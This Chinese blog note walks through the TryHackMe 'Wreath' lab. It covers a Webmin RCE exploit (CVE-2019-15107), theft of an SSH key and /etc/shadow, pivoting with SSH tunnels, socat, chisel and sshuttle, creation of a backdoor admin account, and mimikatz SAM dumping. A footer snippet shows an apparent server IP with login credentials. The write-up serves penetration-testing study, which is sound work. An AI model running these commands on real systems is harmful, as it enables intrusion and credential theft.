【Try Hack Me】内网专项---Wreath

news2024/11/18 20:50:51

THM 学习笔记

【Try Hack Me】内网专项—Wreath


🔥系列专栏:Try Hack Me
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • THM 学习笔记
    • 配置网络
    • 任务5、网络服务器-枚举
    • 任务6、网络服务器-利用
    • 任务7,8、旋转
    • 任务9、透视枚举
    • 任务10、Foxyproxy 旋转代理链
    • 任务11、SSH 隧道/端口转发
    • 任务12、plink.exe 旋转
    • 任务13、Socat 打洞
    • 任务14、Chisel
        • sock转发---1对多
        • 转发端口一对一
    • 任务15、 sshuttle
    • 任务17、Git 服务器 枚举
    • 任务18、Git 服务器 透视

配置网络

没啥可说的,就下载wreath的openvpn文件然后链接即可,打到wreath了的应该都会

任务5、网络服务器-枚举

nmap -sS -sV -A -T4 10.200.87.200

在这里插入图片描述在这里插入图片描述

在这里插入图片描述因为http://10.200.90.200 重定向到 https://thomaswreath.thm/
所以添加hosts,添加hosts是每一个域必备的
gedit /etc/hosts

在web页面可以获得手机号码

在这里插入图片描述

任务6、网络服务器-利用

使用 CVE-2019-15107 Webmin RCE 访问目标系统:

git clone https://github.com/MuirlandOracle/CVE-2019-15107
cd CVE-2019-15107 && pip3 install -r requirements.txt
sudo apt install python3-pip
chmod +x ./CVE-2019-15107.py
./CVE-2019-15107.py 10.200.90.200

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述伪shell已经建立,并且是root,所以去拿他的ssh私钥(因为nmap扫出来了)

捕获的 .ssh 私钥 + 访问目标 在下面 /root/.ssh/id_rsa
base64编码,复制到本地之后再解码即可

chmod 600 id_rsa
ssh -i id_rsa root@10.200.90.200

检查/etc/shadow
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述md5sum比对一下
确保我们在解码过程中无误
在这里插入图片描述
在这里插入图片描述

任务7,8、旋转

在这里插入图片描述

任务9、透视枚举

在这里插入图片描述

在不进行隧道的情况下利用本机自带命令进行扫描

Command: for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep “bytes from” &); done

Command: for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

在这里插入图片描述

任务10、Foxyproxy 旋转代理链

是真的慢,非常慢。。
没用,别用这个,麻烦简陋
但是凑活用一下也还行
在这里插入图片描述
在 ~/etc/proxychains.conf最下面添加一条就行
在这里插入图片描述扫描代理链时需要注意的其他事项:

只能使用 TCP 扫描 - 因此没有 UDP 或 SYN 扫描。 ICMP Echo 数据包(Ping 请求)也不能通过代理工作,所以使用
-Pn切换以防止 Nmap 尝试它。
这将 非常 缓慢。 在使用 NSE 时尝试仅通过代理使用 Nmap(即,在代理 nmap 的本地副本以使用脚本库之前,使用静态二进制文件查看打开的端口/主机在哪里

任务11、SSH 隧道/端口转发

在这里插入图片描述

1. 检查ssh状态
sudo systemctl status ssh
2. 没开启的话开启
sudo systemctl start ssh
3. 从远程计算机 (172.16.0.100) 的端口 22 到本地计算机 (172.16.0.200) 的端口 2222 的反向端口转发,id_rsa和后台shell,用户名是“kali” 
ssh -R 22:172.16.0.100:2222 kali@172.16.0.200 -i id_rsa -fN
5. 在端口 8000 上设置转发代理到 user@target.thm ,以后台运行 shell? 
ssh -L 8000 user@target.thm -fN

任务12、plink.exe 旋转

不好用
在这里插入图片描述

任务13、Socat 打洞

在这里插入图片描述

两种方式
1. 直接开端口(在已控机器)
./socat tcp-l:[本地自选端口],fork,reuseaddr tcp:【深层机器端口:ip】 &

2. 不开端口
kali执行(把8001的流量打给8000)
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
已控机器执行(把目标端口的流量打给8001./socat tcp:【kali的ip:8001】 tcp:【目标的ip:port】,fork &
最终访问8000,就是访问8001,就是访问目标port

任务14、Chisel

在这里插入图片描述
总的来说

1. 建立服务端
./chisel server -p 12345 --reverse
本地开启12345启动服务
2. 建立客户端
chisel.exe client 【kali的ip:port】 R:socks
3. 添加sock(proxychains添加socks5即可)

下面拓展的看一下

sock转发—1对多

反向sock
kali:
./chisel server -p 【kali服务端口】 --reverse &
靶机
./chisel client ATTACKING_IP:【kali服务端口】 R:socks &
这个里面也可以是chisel.exe
注意我们设置的监听端口不一定就是最终的监听端口,而要看攻击机最终的显示

正向
靶机
./chisel server -p 【本地被监听端口】 --socks5
kali
./chisel client 【被监听主机:ip】 【本地监听端口】:socks

转发端口一对一

反向端口转发
kali执行
./chisel server -p 【本机服务端口】 --reverse &
靶机执行
./chisel client 【kali的ip:服务端口】 R:【自选要在kali打开的端口】:【目标ip:port】 &

正向端口转发
靶机执行
./chisel server -p 【要靶机开启的port】
kali执行
./chisel client 【靶机开启的ip:port】 【本地代理端口】:【深层IP:port】

任务15、 sshuttle

在这里插入图片描述

密码登陆
sshuttle -r user@172.16.0.5 172.16.0.0/24

证书登陆
sshuttle -r root@10.200.87.200 --ssh-cmd “ssh -i id_rsa” 10.200.90.200/24 -x 10.200.90.200

-x用于控制主机在内网同网段

任务17、Git 服务器 枚举

可以传一个nmap过去,也可以在自己机器上直接proxychain nmap来搞
,没啥说的就是一个nmap
在这里插入图片描述

任务18、Git 服务器 透视

这里要注意的一点就是检验icmp也就是能不能ping通,这非常有必要
在这里插入图片描述

sshuttle -r root@10.200.87.200  --ssh-cmd "ssh -i id_rsa" 10.200.87.200/24 -x 10.200.87.200

http://10.200.87.150/registration/login/?next=gitstack/

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述firewall-cmd --zone=public --add-port PORT/tcp

在这里插入图片描述Content-Type: application/x-www-form-urlencoded
在这里插入图片描述
在这里插入图片描述net user rongsec HUchengrong! /add
net localgroup Administrators rongsec /add
net localgroup “Remote Management Users” rongsec /add

evil-winrm -u rongsec -p HUchengrong! -i 10.200.87.150
在这里插入图片描述
xfreerdp /v:10.200.87.150 /u:rongsec /p:HUchengrong! +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

除了变量其他都不变

在这里插入图片描述

在这里插入图片描述

privilege::debug
token::elevate
lsadump::sam

在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/11220.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

编程基础都要懂的计算机组成

学习目标: 1. 能够说出计算机有那两部分组成 2. 能够说出操作系统的作用 1.1计算机组成 计算机是可以进行数值计算和逻辑运算, 并且具有存储功能的电子机器. 计算机由硬系统件和软件系统组成. 1.1.1 硬件系统 主要分为主机和外设两部分, 是指那些构成计算机系统的物理实体,…

123456

hostname web1 bash 113.219.215.44 ctyun/Ctyun2022 cd /data/html/ tar -cvf /home/ctyun/html_zy.tar ./ mysqldump -uctyun -p --skip-lock-tables -R ultrax>ultrax_zhouyue.sql cd /etc/httpd tar -cvf /home/ctyun/httpd_zhouyue.tar ./ 关机改云主机私有网卡…

APP逆向案例之(一)过 app 更新提示

案例:某APP打开时提示更新 思路:想这是查壳看看有没有加壳,没有就去反编译按照提示搜索下,结果却是没有加壳反编译了下搜索,搜索不到,后来想到是不是网络传过来的,那这样是不是就要先获取本身AP…

Spring(十四)- Spring注解原理解析

文章目录一、Spring注解原理解析1. 使用xml配置扫描组件的原理解析2. 使用配置类扫描组件的原理解析一、Spring注解原理解析 1. 使用xml配置扫描组件的原理解析 使用Component等注解配置完毕后&#xff0c;要配置组件扫描才能使注解生效 ⚫ xml配置组件扫描&#xff1a; <c…

springboot RestTemplate优化 http 池化

http通信之三次握手 为了对每次发送的数据量进行跟踪与协商&#xff0c;确保数据段的发送和接收同步&#xff0c;根据所接收到的数据量而确认数据发送、接收完毕后何时撤消联系&#xff0c;并建立虚连接。 TCP在发送新的数据之前&#xff0c;以特定的顺序将数据包的序号&#…

【LeetCode 力扣】3.无重复字符的最长子串 Java实现 滑动窗口

题目链接&#xff1a;3.无重复字符的最长子串 1 原题描述&#xff1a; 2 解题思路 初看此题&#xff0c;其实并不难理解&#xff0c;我们一共有两个指针&#xff0c;一个时我们子串的头 start &#xff0c;一个是我们子串的尾 end。我们的尾 end 依次加一&#xff0c;然后判…

dpdk 多线程 gdb + master

1、 main线程没有调用pthread_join 一、初始化 1、rte_eal_cpu_init()函数中&#xff0c;通过读取/sys/devices/system/cpu/cpuX/下的相关信息&#xff0c;确定当前系统有哪些CPU核&#xff0c;已经每个核属于哪个CPU Socket。 2、eal_parse_args()函数&#xff0c;解析-c参数…

力扣:递增子序列java

力扣&#xff1a;递增子序列java 流程: 设置一个结果集和路径path 本题不设置used而是再当前层设置一个map 递归三部曲&#xff1a; 参数和返回值&#xff1a;参数为输入数组nums&#xff0c;开始下标startindex&#xff0c;返回值为空 对path>1时的path输入结果集//放到这…

OTP语音芯片SOP8的前世今生_如九齐_硕呈_钰绅等以及国产方案KT148A

目录 一、语音芯片的形态简介 语音芯片ic的其中一个品类&#xff0c;就是SOP8封装的OTP语音芯片&#xff0c;非常的经典和常用。源头的供应商基本都是台系的原厂&#xff0c;比如&#xff1a;九齐、硕呈、佑华等等&#xff0c;其中佑华就算是鼻祖了&#xff0c;早期的4位机也是…

JSP脚本

在 JSP 中&#xff0c;可以使用 JSP 脚本写入 Java 代码。 JSP 脚本可以包含任意数量的 Java 语句&#xff0c;变量、方法和表达式。JSP 脚本会把包含的内容插入到 Servlet 的 service() 方法中。 JSP 脚本语法如下&#xff1a; <% Java语句 %> <jsp:scriptlet>J…

【kubernetes篇】使用Harbor仓库管理kubernetes镜像

引言 Docker容器应用的开发和运行离不开可靠的镜像管理&#xff0c;在企业级的Docker Registry管理项目中&#xff0c;一般使用Harbor&#xff0c;它包括权限管理(RBAC)、LDAP、日志审核、管理界面、自我注册、镜像复制和中文支持等功能。 今天就将Harbor仓库的安装和使用做一…

【手把手】教你玩转SpringCloud Alibaba之GateWay

1、什么是GateWay 在微服务架构中&#xff0c;一个系统会被拆分为很多个微服务。那么作为客户端要如何去调用这么多的微服务呢&#xff1f;如果没有网关的存在&#xff0c;只能在客户端记录每个微服务的地址&#xff0c;然后分别去调用。这样的话会产生很多问题: - 客户端多次…

2022年亚太地区大学生数学建模竞赛/2022年亚太杯思路

解题方向&#xff1a; 回复&#xff1a;亚太 2022年第十二届亚太地区大学生数学建模竞赛(以下简称“竞赛”)是北京图象图形学学会主办的亚太地区大学生学科类竞赛&#xff0c;竞赛由亚太地区大学生数学建模竞赛组委会负责组织&#xff0c;欢迎各高等院校按照竞赛章程及有关规定…

【EC200U】何为QuecPython以及QPYcom基础操作

EC200U 何为QuecPython以及QPYcom基础操作QuecPython介绍Quec是啥MicroPythonQuecPython与MicroPython的关系QuecPython技术特性IDE(QPYcom)基础操作创建项目导入脚本方法1方法2运行脚本QuecPython是个啥&#xff0c;QPYcom怎么用? QuecPython介绍 Quec是啥 Quec 取自 Quect…

生产环境日志打印console.log内存溢出解决方法

在开发环境里面&#xff0c;开发者经常喜欢使用 console.log 进行日志打印&#xff0c;很好的提高了开发者的开发效率&#xff0c;但是这样容易产生新的问题&#xff0c;因为console的使用&#xff0c;影响内存的滥用&#xff0c;可能造成内存溢出。 分析内存上述的原因 传递…

*深入学习函数(3)-- 递归篇(图文详解)

目录 一、什么是递归 推荐两个问答社区网站 二、递归的两个必要条件 三、递归练习 1、接收一个整型值&#xff08;无符号&#xff09;&#xff0c;按照顺打印它的每一位。输入&#xff1a;1234&#xff0c;输出&#xff1a;1 2 3 4 2、编写函数不允许创建临时变量&#xff0…

rt_thread生成工程模板

系列文章目录 rt-thread 之 fal移植 文章目录系列文章目录前言一、下载ENV 和 RTT源码二、选择BSP生成模板step1 打包模板step2 修改工程模板三、添加软件包和组件step 1选择配置step 2下载软件包和组件step3 生成工程总结常见指令前言 menuconfig 图形化配置界面&#xff0c…

艾美捷Cas9核酸酶参数说明和应用

CRISPR/Cas9是细菌和古细菌在长期演化过程中形成的一种适应性免疫防御系统。CRISPR/Cas9系统通过将入侵噬菌体和质粒DNA的片段整合到CRISPR序列中&#xff0c;并利用相应的CRISPR RNAs &#xff08;crRNAs&#xff09;来指导Cas9蛋白对同源序列的降解&#xff0c;从而提供免疫性…

学习MongoTemplate操作MongoDB增删改查

学习MongoTemplate操作MongoDB增删改查一、准备1、依赖2、yml3、实体类二、案例1、增2、删3、改4、查4.1、根据Id查询数据4.2、条件查询方法4.3、模糊查询4.4、分页查询一、准备 1、依赖 <dependency><groupId>org.springframework.boot</groupId><artif…

脑机直播 x 赛博驱魔!瑞云专访揭秘胶囊计划国风科幻神作《终极体验》制作幕后...

2021年11月B站发起了一个以扶持国内动画人为愿景与出发点的特别项目《胶囊计划》&#xff0c;以搭建一条全新的道路探索未来行业的方式。Renderbus瑞云渲染一直十分关注国创动画的发展&#xff0c;刚刚结束的2022年小宇宙计划就是由B站主办瑞云协办的青年动画赛事&#xff0c;胶…